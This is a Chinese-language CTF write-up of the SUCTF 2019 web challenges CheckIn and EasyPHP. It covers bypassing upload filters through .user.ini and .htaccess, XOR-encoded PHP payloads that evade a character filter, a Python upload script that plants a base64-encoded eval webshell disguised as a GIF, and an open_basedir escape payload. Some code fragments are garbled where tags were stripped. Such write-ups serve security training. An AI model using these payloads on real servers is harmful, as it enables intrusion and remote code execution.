SUCTF2019复盘

WEB

CheckIn

• 解题过程
  题目功能是一个文件上传，可以上传jpg、png等文件，但是限制了php，而且还判断了上传的文件头，使用exif_image来判断的，这个很容易绕过，直接随便加一个图片文件头就行，并且上传之后会给出文件所在目录
  ，且上传的内容中不能包含字符
  

尝试了.htaccess，发现不行,换思路，使用.user.ini修改配置文件

或者连接shell管理客户端

注意点：

1. .user.ini实际上就是一个可以由用户“自定义”的php.ini，我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置
2. 前提是含有.user.ini的文件夹下需要有正常的php文件，否则也不能包含了

参考资料：.user.ini文件构成的PHP后门

EasyPHP

• 解题过程
  首先进行代码审计，如下

 18) {
    die('One inch long, one inch strong!');
}

if (preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh)) {
    die('Try something else!');
}

$character_type = count_chars($hhh, 3); //count_chars — 返回字符串所用字符的信息 3 - 返回由所有使用了的字节值组成的字符串。
if (strlen($character_type) > 12) {
    die("Almost there!");
}
//最多使用12个字符
eval($hhh);
?>

题目分成两个部分，第一部分是执行getTheFlag函数,第二部分是上传shell
先分析第一部分，类似题目参看ISITDTU CTF 2019 EasyPHP 回顾

参考这两篇文章：
PHP不使用数字,字母和下划线写shell
一道题回顾php异或webshell

正则过滤了绝大部分可用字符串，可以使用多个字符异或进行构造，但是直接调用函数长度明显是不够的，这里可以用GET的方式传入我们想要调用的函数，首先FUZZ出_GET，注意这里需要使字符串去重后小于等于12

Python版本
  target = "_GET"
    payload = ""
    for tar in target:
        for i in range(255):
            temp = 255^i
            if chr(temp) == tar:
                payload = payload+str(hex(i))
                break
    head = "%e9"*4
    payload = payload.replace("0x","%")
    print(head+"^"+payload)

php版本

构造出如下payload：${%A0%B8%BA%AB^%ff%ff%ff%ff}{%A0}();&%A0=get_the_flag
接着是第二部分上传文件了进行getshell

#index.html



  


  
  #enctype 属性规定在发送到服务器之前应该如何对表单数据进行编码
    Filename:
     
    

    
  

上传这里需要绕过图片头和

    //.htaccess
#define xlogo_width 200
#define xlogo_height 200
AddType application/x-httpd-php .gif
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_f528764d624db129b32c21fbca0cb8d6/evil.gif"
    //evil.gif
GIF89a12PD9waHAgZXZhbCgkX1BPU1RbJ2MnXSk7Pz4=

getshell后访问跟目录时才发现是没有权限的，查看phpinfo的信息可以看到开启了open_basedir

同时还禁用了一些函数

使用蚁剑插件绕过disable_functions
参考：绕过disable_functions 插件应用 SUCTF EasyPHP
注意点：连上去之后再传一个PHP小马，再使用插件进行提权

import requests
import base64

url = "http://7adea2c4-8b2f-4da3-a59f-a1db1559a48b.node1.buuoj.cn/?_=${%fe%fe%fe%fe^%a1%b9%bb%aa}{%fe}();&%fe=get_the_flag"


htaccess = b"""\x00\x00\x8a\x39\x8a\x39
AddType application/x-httpd-php .gif
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_fd40c7f4125a9b9ff1a4e75d293e3080/shell.gif"

"""

shell = b"\x00\x00\x8a\x39\x8a\x39"+b"00"+ base64.b64encode(b"")
#shell = b"\x00\x00\x8a\x39\x8a\x39"+b"00"+ b""

files = [('file',('.htaccess',htaccess,'image/jpeg'))]

data = {"upload":"Submit"}

proxies = {"http":"http://127.0.0.1:8080"}
r = requests.post(url=url, data=data, files=files)#proxies=proxies)
# print r.text


files = [('file',('shell.gif',shell,'image/jpeg'))]
r = requests.post(url=url, data=data, files=files)
print(r.text)

payload:
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');print_r(scandir('/'));
参考资料：
SUCTF2019部分web题解
SUCTF的一些题解
# SUCTF 2019 Writeup